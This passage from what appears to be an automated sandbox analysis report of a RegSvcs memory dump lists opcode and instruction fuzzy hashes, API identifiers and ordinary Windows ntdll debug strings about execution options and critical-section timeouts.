                                                                          • Instruction Fuzzy Hash: F1010032504B229BCF218F1A9840A237BA4EB55B607108A2EF9958B7A1C331D801CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8f2dc96ccf8c4659f8f5e2746856ef6699f9dd7d78a15384e79ca927883aba96
                                                                          • Instruction ID: 1581cbeb36429356b762979e01a177537724a213fd708f05fedd59937bb0576f
                                                                          • Opcode Fuzzy Hash: 8f2dc96ccf8c4659f8f5e2746856ef6699f9dd7d78a15384e79ca927883aba96
                                                                          • Instruction Fuzzy Hash: F5118E36241241EFDB25EF19C991F16BBB8FF94B84F10046AE9059F6A1C635ED01CA90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e8b7f6687243be63febf036335b52c884275f27921eecc209c93538c78208f36
                                                                          • Instruction ID: d58a29878c1d8f72df60655741b937c17984231811974c3aeafb2290b2b1b3da
                                                                          • Opcode Fuzzy Hash: e8b7f6687243be63febf036335b52c884275f27921eecc209c93538c78208f36
                                                                          • Instruction Fuzzy Hash: 7601A7B1241701AFD331AF1AD841F06BAB8FF65B50F02482EF316AF390D6B0D9418B55
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 386d3b69ee0c098423db7aa055420bbab75288b9dd84519616407a1dd0beca3f
                                                                          • Instruction ID: 8999fb2c5bab0b57a01269ed74df4c437017fa170f26eb90df8ff778be37ce4f
                                                                          • Opcode Fuzzy Hash: 386d3b69ee0c098423db7aa055420bbab75288b9dd84519616407a1dd0beca3f
                                                                          • Instruction Fuzzy Hash: 63F0F932641611B7C7319F578D44F077EEDEB94B91F11442EA60597610C670ED01C7A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                          • Instruction ID: d832d84f33339b9b494660e5d7873c48ca9783cf84d4d95c472522f5e001b4d9
                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                          • Instruction Fuzzy Hash: 41F0C8B3600615ABD325CF4DDC40E57FBEAEBD1A90F048169E515CB360E631ED04CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                          • Instruction ID: e84a3a6074030530aab3dbc4c346b14ddd03ea5b47eb7d6b6036606391a6f92e
                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                          • Instruction Fuzzy Hash: BAF0FC732446239BDF32179A48E4B6BA6959FE1A64F1A003FE2059B364CD708D02D6D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                          • Instruction ID: 081db4441957a5841e792b17381e23d0a348ca5ea307bcf41470c0bd35ca5419
                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                          • Instruction Fuzzy Hash: 02018132240685DBE323D65EC805B5DBFD8FF51754F0944AAFE548F6A1D6B9C801C251
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 568ceded86812186dee190f08574dbe6d9ebff50450d523c1492329f54465611
                                                                          • Instruction ID: d86c455aabc4d4e194e95971160a1129ac97b12fc618e6dcda46c559cd15c426
                                                                          • Opcode Fuzzy Hash: 568ceded86812186dee190f08574dbe6d9ebff50450d523c1492329f54465611
                                                                          • Instruction Fuzzy Hash: 08E08C331004906BC621FE6EDD10F5A739EEBB4260F05022AB1559B2A0CA70AC01C794
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                          • Instruction ID: c4f9d3eaa1cd72b2156ed38ce3d85794d698afca96f131e26d88f308380d2dc9
                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                          • Instruction Fuzzy Hash: 44E08633111A1487D729DE18D511B7677E4FF45730F09463EA6134B784C674E544C794
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                          • Instruction ID: 2c404b4774a8df434c625c5d78ef4c85693eed691e466799607a8c8807758c35
                                                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                          • Instruction Fuzzy Hash: E0D05E36511A50EFC7329F1BEA00D13BBF9FBD4A1070A062FA54583A20C670A806CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                          • Instruction ID: 3148fd14f95f1865afdfa8bdd3153509da1ba0bb1d7667851d9cfa6533fecca1
                                                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                          • Instruction Fuzzy Hash: 21D0A933204660ABDB72AA1DFC00FC333E8BB98760F06045EB008CB160C364AC81CA84
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                          • Instruction ID: 1a01a3cb344480879e2da73bdbda0b4c448ca0f1751d4a1d2ed9ff7fd8e69474
                                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                          • Instruction Fuzzy Hash: 65E08C329006809BCF52DF9AC650F4EFBF4FB94B00F150008A5086F220C334AD00CB40
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                          • Instruction ID: 8d6927958299e6b5f34fa1e853d489fae722d93150fe70860cdfc481265a5d7f
                                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                          • Instruction Fuzzy Hash: 04D0223331207193CF295A666820F676905AB80A90F2A002F350A93A20C0248C43C2E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                          • Instruction ID: 9225a92194804174032a42ca17113a8d689b753528dcdb15870866f28a107126
                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                          • Instruction Fuzzy Hash: FDD012371D054DBBCB119F66DC01F957BA9E764BA0F454025B604875A0C63AE950D584
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 718a2801849d888d1e283bf872ac2b0801e474d88214f543f7bf630ea0dd66af
                                                                          • Instruction ID: 749f2c2022772a247e3c15dc8ff9e3be5849da2e410c43191d200b12083f2502
                                                                          • Opcode Fuzzy Hash: 718a2801849d888d1e283bf872ac2b0801e474d88214f543f7bf630ea0dd66af
                                                                          • Instruction Fuzzy Hash: A4D0A731545002CBEF27CF0AC520E2E3AB0FB10640F40006DEF4159520D325EC01C710
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                          • Instruction ID: 16a4e7098035fcea73ef08b31227c88240dbea341639a18f86850939151bdac1
                                                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                          • Instruction Fuzzy Hash: 1CD09239252A80CFD61A8B0CC5A4B1633A4BB84A44F860895E501CBB22D638D940CA10
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                          • Instruction ID: a33d78e3832e0e9312470e8c96422ce28b9071507bc1ec9cefa3c6fe30eea4cc
                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                          • Instruction Fuzzy Hash: 67C08033150644AFC711DF95CD01F0177A9F7A8B40F010025F30447670C531FC10D644
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                          • Instruction ID: a20f732710adc345da54c64d7a809aeca6d2dfe6c6f867a2d578e3a86d24e88f
                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                          • Instruction Fuzzy Hash: 29D01236100249EFCB12DF85C890E9A772AFBD8750F108019FD190B650CA31ED62DA50
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                          • Instruction ID: b9e33bfeadf10a07ed4f3f6828503570d867cdd24ff5f76005168647c5612d34
                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                          • Instruction Fuzzy Hash: A0C04879701A468FDF16DF2AD294F4977E4FB94740F150894E905CBB22E624E802CA10
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65b87aeb3cd0620108c6212368f071dd6f328ea06e9ae16bd3343b814ec14d6e
                                                                          • Instruction ID: 8fb79574a29d9f1584ebb04fc75fbf363065cd942f477c7759e186d4e3e96628
                                                                          • Opcode Fuzzy Hash: 65b87aeb3cd0620108c6212368f071dd6f328ea06e9ae16bd3343b814ec14d6e
                                                                          • Instruction Fuzzy Hash: 81900231605800129144715848845464155B7E0311B59C511F0428A54CCA548A576361
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 982ef6b1478092c6cac1c042fea3153a46b5bdd48fb45a60cacf4164ef86c7aa
                                                                          • Instruction ID: 234fe5aded64c9876fa96885af54626f7d7fb8690da86f071451de8b9cd56120
                                                                          • Opcode Fuzzy Hash: 982ef6b1478092c6cac1c042fea3153a46b5bdd48fb45a60cacf4164ef86c7aa
                                                                          • Instruction Fuzzy Hash: A9900261601500424144715848044066155B7E1311399C615B0558A60CC6588956A369
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37aae11ab5a6bfe1584e965d480c9e01acae54d32abc32029bedfc082c460877
                                                                          • Instruction ID: d4ac229f85b3d8d5da0d5411a5583bf189a9a5774a081817d888a44d836b598c
                                                                          • Opcode Fuzzy Hash: 37aae11ab5a6bfe1584e965d480c9e01acae54d32abc32029bedfc082c460877
                                                                          • Instruction Fuzzy Hash: CC90023120140802D1847158440464A0155A7D1311F99C515B0029B54DCA558B5A77A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ec073c353f207e310c25dc9864fd9ac31df94903d221d604f6d4e5b1fe60735
                                                                          • Instruction ID: c884fab5382d7fab6d13d60e2c859e7f654d05a622724adb1ea7d242c523e8ea
                                                                          • Opcode Fuzzy Hash: 9ec073c353f207e310c25dc9864fd9ac31df94903d221d604f6d4e5b1fe60735
                                                                          • Instruction Fuzzy Hash: DF90023120544842D14471584404A460165A7D0315F59C511B0068B94DD6658E56B761
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f2f7c6cbe5228ec8ed0ac8add4c1a9da8966c3dc31038e0506fd54d97e2fb290
                                                                          • Instruction ID: f6ad38c2c221d1034ab973476122497cb8250a66c63e440bcff338a05312b9b5
                                                                          • Opcode Fuzzy Hash: f2f7c6cbe5228ec8ed0ac8add4c1a9da8966c3dc31038e0506fd54d97e2fb290
                                                                          • Instruction Fuzzy Hash: 2590023120140802D108715848046860155A7D0311F59C511B6028B55ED6A589927231
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9dbc93bce8d6469caf9f5ac1ce423432a1ce7f66395178c5800e51eac1f173b4
                                                                          • Instruction ID: 4572c39914d0663d70f3c83cff5c4282eb0e019d23a4655ed3f9c6b8634a66cc
                                                                          • Opcode Fuzzy Hash: 9dbc93bce8d6469caf9f5ac1ce423432a1ce7f66395178c5800e51eac1f173b4
                                                                          • Instruction Fuzzy Hash: CF90023160540802D154715844147460155A7D0311F59C511B0028B54DC7958B5677A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 701793f5dc0921798f4f402f41acebc429e1c051afcdd99ad4cc8e02e50e61d9
                                                                          • Instruction ID: 37dde6e875a1d2a17b0455a019d3537bf1858a34001f85d0ce15724924caeff7
                                                                          • Opcode Fuzzy Hash: 701793f5dc0921798f4f402f41acebc429e1c051afcdd99ad4cc8e02e50e61d9
                                                                          • Instruction Fuzzy Hash: B9900225211400030109B55807045070196A7D5361359C521F1019A50CD66189626221
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          • Instruction ID: 8ef994b424e275a7ec3d59b41f469d62e8f15a6e7a2fef9f09857af9a7ab6a0c
                                                                          • Opcode Fuzzy Hash: c0511d18a04e87726995adeae9c4e2bbbd4328c59468a7530801ab1959fa06cc
                                                                          • Instruction Fuzzy Hash: 3A90022124545102D154715C44046164155B7E0211F59C521B0818A94DC59589567321
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d35137d303176c24bc678ff9d8d52a0e2e25041151f4405c14155c327301f5d
                                                                          • Instruction ID: 9de7dc5e353c01eadbb2c7efe10466057d9c06c96d7f65774f3e885bd8a5952a
                                                                          • Opcode Fuzzy Hash: 4d35137d303176c24bc678ff9d8d52a0e2e25041151f4405c14155c327301f5d
                                                                          • Instruction Fuzzy Hash: 8C90023520140402D514715858046460196A7D0311F59D911B0428A58DC69489A2B221
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 527c4475a619353085beb6a3a1d06cfbd8439433289793a435251a69bd12e0ac
                                                                          • Instruction ID: ae55a6fa792b363798389803d76fd31107cb900fc3785dc4a96d02b8672de84f
                                                                          • Opcode Fuzzy Hash: 527c4475a619353085beb6a3a1d06cfbd8439433289793a435251a69bd12e0ac
                                                                          • Instruction Fuzzy Hash: 5B90023120240142954472585804A4E4255A7E1312B99D915B0019A54CC95489626321
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 81e4daad23eb05767181d12090ced7ee78b0ff0d4931b5babe844c99ca88d385
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          Strings
                                                                          • Execute=1, xrefs: 01554713
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01554655
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015546FC
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01554725
                                                                          • ExecuteOptions, xrefs: 015546A0
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01554787
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01554742
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          Strings
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015502E7
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015502BD
                                                                          • RTL: Re-Waiting, xrefs: 0155031E
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          Strings
                                                                          • RTL: Resource at %p, xrefs: 01557B8E
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01557B7F
                                                                          • RTL: Re-Waiting, xrefs: 01557BAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0155728C
                                                                          Strings
                                                                          • RTL: Resource at %p, xrefs: 015572A3
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01557294
